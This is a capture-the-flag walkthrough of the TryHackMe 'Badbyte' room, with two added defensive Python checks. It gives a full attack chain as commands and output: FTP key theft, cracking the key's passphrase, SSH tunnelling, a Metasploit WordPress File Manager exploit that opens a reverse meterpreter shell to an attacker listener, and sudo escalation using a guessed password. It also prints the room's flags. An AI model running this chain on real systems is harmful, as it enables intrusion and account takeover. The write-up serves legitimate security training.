TryHackMe-Badbyte

From aldeid

Infiltrate BadByte and help us to take over root.

Reconnaissance

How many ports are open?

Running an Nmap full port scan reveals 2 open ports; the service scan below (-A) was then run against just those two:

[email protected]:/data/Badbyte$ nmap -A -p 22,30024 10.10.11.45
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-03 14:00 CEST
Nmap scan report for 10.10.11.45
Host is up (0.044s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:a2:ed:93:4b:9c:bf:bb:33:4d:48:0d:fe:a4:de:96 (RSA)
|   256 22:72:00:36:eb:37:12:9f:5a:cc:c2:73:e0:4f:f1:4e (ECDSA)
|_  256 78:1d:79:dc:8d:41:f6:77:60:65:f5:74:b6:cc:8b:6d (ED25519)
30024/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 ftp      ftp          1743 Mar 23 20:03 id_rsa
|_-rw-r--r--    1 ftp      ftp            78 Mar 23 20:09 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.8.50.72
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.35 seconds

Answer: 2

What service is running on the lowest open port?

Answer: ssh

What non-standard port is open?

Answer: 30024

What service is running on the non-standard port?

Answer: ftp

Foothold

What username do we find during the enumeration process?

The FTP service allows anonymous login:

[email protected]:/data/Badbyte$ ftp 10.10.11.45 30024
Connected to 10.10.11.45.
220 (vsFTPd 3.0.3)
Name (10.10.11.45:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Listing the files will reveal 2 files:

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Mar 23 20:09 .
drwxr-xr-x    2 ftp      ftp          4096 Mar 23 20:09 ..
-rw-r--r--    1 ftp      ftp          1743 Mar 23 20:03 id_rsa
-rw-r--r--    1 ftp      ftp            78 Mar 23 20:09 note.txt
226 Directory send OK.

The txt file is a note that discloses a username: errorcauser.

ftp> get note.txt -
remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (78 bytes).
I always forget my password. Just let me store an ssh key here.
- errorcauser
226 Transfer complete.
78 bytes received in 0.00 secs (72.6831 kB/s)

We’ll download the id_rsa file as well, as it is likely an SSH private key.

ftp> get id_rsa
local: id_rsa remote: id_rsa
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for id_rsa (1743 bytes).
226 Transfer complete.
1743 bytes received in 0.00 secs (803.2791 kB/s)
ftp> exit
221 Goodbye.

Answer: errorcauser

What is the passphrase for the RSA private key?

Now, give the key file the restrictive permissions SSH requires and use it to connect to the SSH service. Unfortunately, the key is protected by a passphrase:

[email protected]:/data/Badbyte/files$ chmod 600 id_rsa 
[email protected]:/data/Badbyte/files$ ssh -i id_rsa [email protected]
load pubkey "id_rsa": invalid format
Enter passphrase for key 'id_rsa': 

Let’s crack the key with John the Ripper:

[email protected]:/data/Badbyte/files$ /data/src/john/run/ssh2john.py id_rsa > ssh.hash
[email protected]:/data/Badbyte/files$ /data/src/john/run/john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Note: This format may emit false positives, so it will keep trying even after finding a
possible candidate.
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cupcake          (id_rsa)
1g 0:00:00:14 DONE (2021-05-03 14:02) 0.06729g/s 965120p/s 965120c/s 965120C/sa6_123..*7¡Vamos!
Session completed. 

Answer: cupcake

Port forwarding

What main TCP ports are listening on localhost?

Now that we have the passphrase, we can connect. A note on the box tells us there is a web server running, but it is only reachable from localhost:

-bash-4.4$ cat note.txt
Hi Error!
I've set up a webserver locally so no one outside could access it.
It is for testing purposes only.  There are still a few things I need to do like setting up a custom theme.
You can check it out, you already know what to do.
-Cth
:)

Disconnect and reconnect with the following option to set up Dynamic Port Forwarding through SSH (a SOCKS proxy on local port 1337):

[email protected]:/data/Badbyte/files$ ssh -i id_rsa -D 1337 [email protected]

Now, set up proxychains for the Dynamic Port Forwarding. Ensure you have commented out socks4 127.0.0.1 9050 in your proxychains configuration and have added socks5 127.0.0.1 1337 to the end of configuration file (/etc/proxychains.conf):

[email protected]:/etc$ egrep '^[^#]' /etc/proxychains.conf 
strict_chain
proxy_dns 
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5  127.0.0.1 1337

Running a TCP connect scan against the server's loopback interface through proxychains will now reveal the web port, as well as MySQL:

[email protected]:/etc$ proxychains nmap -sT 127.0.0.1
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-03 14:29 CEST
|S-chain|-<>-127.0.0.1:1337-<><>-127.0.0.1:80-<><>-OK
|S-chain|-<>-127.0.0.1:1337-<><>-127.0.0.1:5900-<--timeout
|S-chain|-<>-127.0.0.1:1337-<><>-127.0.0.1:3389-<--timeout

[REDACTED]

|S-chain|-<>-127.0.0.1:1337-<><>-127.0.0.1:1048-<--timeout
|S-chain|-<>-127.0.0.1:1337-<><>-127.0.0.1:49154-<--timeout
|S-chain|-<>-127.0.0.1:1337-<><>-127.0.0.1:646-<--timeout
Nmap scan report for localhost (127.0.0.1)
Host is up (0.046s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 48.29 seconds

After finding the port of the webserver, perform Local Port Forwarding to that port using SSH with the -L flag:

[email protected]:/data/Badbyte/files$ sudo ssh -i id_rsa -L 80:127.0.0.1:80 [email protected]
load pubkey "id_rsa": invalid format
Enter passphrase for key 'id_rsa': cupcake

Now, browsing http://127.0.0.1 will show the website that was supposed to be only accessible by localhost on the server.

Answer: 80,3306

What protocols are used for these ports?

Answer: http,mysql

Web exploitation

What CMS is running on the machine?

Browsing the web site (http://127.0.0.1) shows several indications of a WordPress installation:

[email protected]:/etc$ curl -s http://127.0.0.1 | grep -i wordpress
<meta name="generator" content="WordPress 5.7" />
        </nav></section><section id="recent-comments-2" class="widget widget_recent_comments"><h2 class="widget-title">Recent Comments</h2><nav role="navigation" aria-label="Recent Comments"><ul id="recentcomments"><li class="recentcomments"><span class="comment-author-link"><a href='https://wordpress.org/' rel='external nofollow ugc' class='url'>A WordPress Commenter</a></span> on <a href="http://localhost/?p=1#comment-1">Welcome to Badbyte</a></li></ul></nav></section> </aside><!-- .widget-area -->
                Proudly powered by <a href="https://en-gb.wordpress.org/">WordPress</a>.        </div><!-- .powered-by -->

Answer: wordpress

Can you find any vulnerable plugins?

Using the http-wordpress-enum Nmap script will reveal 2 plugins:

[email protected]:/etc$ nmap -p 80 -vv --script http-wordpress-enum --script-args type="plugins",search-limit=1500 127.0.0.1
Starting Nmap 7.80 ( https://nmap.org ) at 2021-05-03 18:01 CEST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 18:01
Completed NSE at 18:01, 0.00s elapsed
Initiating Ping Scan at 18:01
Scanning 127.0.0.1 [2 ports]
Completed Ping Scan at 18:01, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 18:01
Scanning localhost (127.0.0.1) [1 port]
Discovered open port 80/tcp on 127.0.0.1
Completed Connect Scan at 18:01, 0.00s elapsed (1 total ports)
NSE: Script scanning 127.0.0.1.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 18:01
Completed NSE at 18:01, 6.66s elapsed
Nmap scan report for localhost (127.0.0.1)
Host is up, received syn-ack (0.00025s latency).
Scanned at 2021-05-03 18:01:27 CEST for 7s

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-wordpress-enum: 
| Search limited to top 1500 themes/plugins
|   plugins
|     duplicator 1.3.26
|_    wp-file-manager 6.0

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 18:01
Completed NSE at 18:01, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.93 seconds

Two plugins are detected:

* duplicator 1.3.26
* wp-file-manager 6.0

What is the CVE number for directory traversal vulnerability?

Searching the Internet for "cve wordpress duplicator directory traversal" leads to CVE-2020-11738.

Answer: CVE-2020-11738

What is the CVE number for remote code execution vulnerability?

Searching for "cve wordpress remote code execution file manager" leads to CVE-2020-25213.

Answer: CVE-2020-25213
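As an added check that is not part of the original writeup, the script below parses the plugin lines printed by Nmap's http-wordpress-enum script and flags any plugin whose version is below the release that fixed its CVE. The fixed-in thresholds (Duplicator 1.3.28 for CVE-2020-11738, wp-file-manager 6.9 for CVE-2020-25213) are taken from the advisories and are an assumption to verify, not values from this page; the scan excerpt is constructed to match the output above.

```python
import re
from typing import Dict, List, Tuple

# Fixed releases per the CVE advisories (assumption; verify against current advisories):
#   CVE-2020-11738: Duplicator < 1.3.28 (directory traversal)
#   CVE-2020-25213: wp-file-manager < 6.9 (unauthenticated file upload / RCE)
FIXED_IN: Dict[str, Tuple[str, str]] = {
    "duplicator": ("1.3.28", "CVE-2020-11738"),
    "wp-file-manager": ("6.9", "CVE-2020-25213"),
}

# Constructed sample: the plugin block as printed by nmap --script http-wordpress-enum.
SAMPLE_SCAN = """\
| http-wordpress-enum:
| Search limited to top 1500 themes/plugins
|   plugins
|     duplicator 1.3.26
|_    wp-file-manager 6.0
"""

def parse_version(v: str) -> Tuple[int, ...]:
    """Turn '1.3.26' into (1, 3, 26)."""
    return tuple(int(p) for p in v.split("."))

def is_older(found: str, fixed: str) -> bool:
    """True if `found` sorts below `fixed`; shorter tuples are padded with zeros."""
    a, b = parse_version(found), parse_version(fixed)
    n = max(len(a), len(b))
    return a + (0,) * (n - len(a)) < b + (0,) * (n - len(b))

def parse_plugins(scan: str) -> Dict[str, str]:
    """Extract 'slug version' pairs from the indented plugin lines only."""
    plugins: Dict[str, str] = {}
    for line in scan.splitlines():
        m = re.match(r"^\|_?\s{4,}([a-z0-9-]+)\s+(\d+(?:\.\d+)*)\s*$", line)
        if m:
            plugins[m.group(1)] = m.group(2)
    return plugins

def vulnerable_plugins(scan: str) -> List[Tuple[str, str, str]]:
    """Return (slug, version, cve) for every known plugin below its fixed release."""
    hits = []
    for slug, ver in parse_plugins(scan).items():
        if slug in FIXED_IN and is_older(ver, FIXED_IN[slug][0]):
            hits.append((slug, ver, FIXED_IN[slug][1]))
    return hits

if __name__ == "__main__":
    for slug, ver, cve in vulnerable_plugins(SAMPLE_SCAN):
        print(f"{slug} {ver}: below fixed release {FIXED_IN[slug][0]} ({cve})")
```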

Metasploit

There is a Metasploit module for the exploit. You can use it to get a reverse shell. If you are feeling lucky, you can follow any PoC (Proof of Concept) instead.

Fire up Metasploit and search for wp-file-manager. It will show an exploit.

[email protected]:~$ msfconsole -q
[*] Starting persistent handler(s)...
msf6 > search wp-file-manager

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  exploit/multi/http/wp_file_manager_rce  2020-09-09       normal  Yes    WordPress File Manager Unauthenticated Remote Code Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_file_manager_rce

What is the name of the user that was running the CMS?

Let’s use this exploit to get a reverse meterpreter session.

msf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_file_manager_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/wp_file_manager_rce) > set LHOST 10.8.50.72
LHOST => 10.8.50.72
msf6 exploit(multi/http/wp_file_manager_rce) > run

[*] Started reverse TCP handler on 10.8.50.72:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] 127.0.0.1:80 - Payload is at /wp-content/plugins/wp-file-manager/lib/files/CMRdTO.php
[*] Sending stage (39282 bytes) to 10.10.221.123
[+] Deleted CMRdTO.php
[*] Meterpreter session 1 opened (10.8.50.72:4444 -> 10.10.221.123:58718) at 2021-05-03 19:42:28 +0200

meterpreter > getuid
Server username: cth (1000)

Answer: cth

What is the user flag?

meterpreter > shell
Process 1735 created.
Channel 0 created.

python3 -c "import pty;pty.spawn('/bin/bash')"
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

<ress/wp-content/plugins/wp-file-manager/lib/files$ cd /home
cd /home
[email protected]:/home$ ls -la
ls -la
total 16
drwxr-xr-x  4 root root 4096 Mar 23 19:50 .
drwxr-xr-x 24 root root 4096 Mar 22 18:02 ..
drwxr-xr-x  4 cth  cth  4096 Mar 23 21:44 cth
drwxr-xr-x  8 root root 4096 Mar 23 21:30 errorcauser
[email protected]:/home$ ls -l cth
ls -l cth
total 4
-rw-rw-r-- 1 cth cth 38 Mar 23 21:36 user.txt
[email protected]:/home$ cat cth/user.txt            
cat cth/user.txt
THM{227906201d17d9c45aa93d0122ea1af7}

User flag: THM{227906201d17d9c45aa93d0122ea1af7}

Privilege Escalation

What is the user’s old password?

Searching for files owned by cth will show a long list of files, with an interesting bash.log file:

c[email protected]:/home$ find / -type f -user cth -exec ls {} + 2>/dev/null
find / -type f -user cth -exec ls {} + 2>/dev/null
/home/cth/.bash_logout
/home/cth/.bashrc
/home/cth/.cache/motd.legal-displayed
/home/cth/.profile

[REDACTED]

/usr/share/wordpress/wp-snapshots/robots.txt
/usr/share/wordpress/xmlrpc.php
/var/log/bash.log <-------------------------------- interesting!

Having a look at this file shows the last commands entered by the user, who at one point typed his old password as a command by mistake:

[email protected]:/home$ cat /var/log/bash.log
cat /var/log/bash.log
Script started on 2021-03-23 21:05:06+0000
[email protected]:~$ whoami
cth
[email protected]:~$ date
Tue 23 Mar 21:05:14 UTC 2021
[email protected]:~$ suod su

Command 'suod' not found, did you mean:

  command 'sudo' from deb sudo
  command 'sudo' from deb sudo-ldap

Try: sudo apt install <deb name>

[email protected]:~$ [email protected]$sw0rd2020 <----------------------- old password
[email protected]: command not found
[email protected]:~$ passwd
Changing password for cth.
(current) UNIX password: 
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully

[REDACTED]

Answer: [email protected]$sw0rd2020
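The leak above is a classic one: a session recorded with script(1) captures everything typed, including a password entered at the wrong moment. The following scanner, added here and not part of the original writeup, walks such a log and reports any rejected "command" that was echoed back by the shell as not found and looks like a credential, so the owner can rotate it. The log sample is constructed after the excerpt above, with a placeholder in place of the real password and a constructed "cth@badbyte" prompt.

```python
import re
from typing import List, Tuple

# Constructed sample modelled on /var/log/bash.log; the secret is a placeholder.
SAMPLE_LOG = """\
Script started on 2021-03-23 21:05:06+0000
cth@badbyte:~$ whoami
cth
cth@badbyte:~$ suod su
Command 'suod' not found, did you mean:
cth@badbyte:~$ Example$ecret2020
Example$ecret2020: command not found
cth@badbyte:~$ passwd
Changing password for cth.
"""

# "user@host:cwd$ command" as recorded by script(1); group(1) is the command text.
PROMPT_RE = re.compile(r"^\S+@\S+:[^$#]*[$#]\s*(.*)$")
# bash's rejection line for a word it could not resolve as a command.
NOT_FOUND_RE = re.compile(r"^(?P<cmd>.+?): command not found$")

def looks_like_secret(token: str) -> bool:
    """Heuristic: a single token of 8+ chars mixing letters, digits and symbols."""
    return (len(token) >= 8 and " " not in token
            and re.search(r"[A-Za-z]", token) is not None
            and re.search(r"\d", token) is not None
            and re.search(r"[^A-Za-z0-9]", token) is not None)

def find_leaked_secrets(log: str) -> List[Tuple[int, str]]:
    """Return (1-based line number, token) for each rejected command that looks like a credential.

    A hit requires the 'command not found' line to immediately follow a prompt
    line whose command text is exactly that token, so ordinary typos (such as
    'suod su') and program output are not reported.
    """
    lines = log.splitlines()
    hits: List[Tuple[int, str]] = []
    for i in range(1, len(lines)):
        m = NOT_FOUND_RE.match(lines[i])
        if not m:
            continue
        prev = PROMPT_RE.match(lines[i - 1])
        token = m.group("cmd")
        if prev and prev.group(1) == token and looks_like_secret(token):
            hits.append((i + 1, token))
    return hits

if __name__ == "__main__":
    for line_no, token in find_leaked_secrets(SAMPLE_LOG):
        print(f"line {line_no}: possible credential typed at the prompt ({len(token)} chars)")
```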

What is the root flag?

Trying the old password won’t work, but incrementing the year (2021 instead of 2020 at the end of the password) leads to a successful login. The user has full sudo access:

[email protected]:/home$ sudo -l
sudo -l
[sudo] password for cth: [email protected]$sw0rd2021

Matching Defaults entries for cth on badbyte:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cth may run the following commands on badbyte:
    (ALL : ALL) ALL
[email protected]:/home$ sudo -s
sudo -s
[email protected]:/home# cd /root
cd /root
[email protected]:~# ll
ll
total 24
drwx------  3 root root 4096 Mar 23 21:54 ./
drwxr-xr-x 24 root root 4096 Mar 22 18:02 ../
lrwxrwxrwx  1 root root    9 Mar 23 21:16 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Mar 22 18:31 .ssh/
-rw-r--r--  1 root root 1185 Mar 23 21:37 root.txt
[email protected]:~# cat root.txt
cat root.txt
  |      ______    ________   ________              ______        _____________ __________  |
  |     / ____ \  /  ___   \ /   ____ \            / ____ \      /____    ____//   ______/\ |
  |    / /___/_/ /  /__/   //   /   / /\          / /___/_/      \___/   /\___/   /______\/ |
  |   / _____ \ /  ____   //   /   / / /         / _____ \ __   ___ /   / /  /   ____/\     |
  |  / /____/ //  / __/  //   /___/ / /         / /____/ //  | /  //   / /  /   /____\/     |
  | /________//__/ / /__//_________/ /         /________/ |  \/  //___/ /  /   /________    |
  | \________\\__\/  \__\\_________\/          \________\  \    / \___\/  /____________/\   | 
  |                                  _________           __/   / /        \____________\/   |
  |                                 /________/\         /_____/ /                           |
  |                                 \________\/         \_____\/                            |

THM{ad485b44f63393b6a9225974909da5fa}

 ________________________
< Made with ❤ by BadByte >
 ------------------------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||

Root flag: THM{ad485b44f63393b6a9225974909da5fa}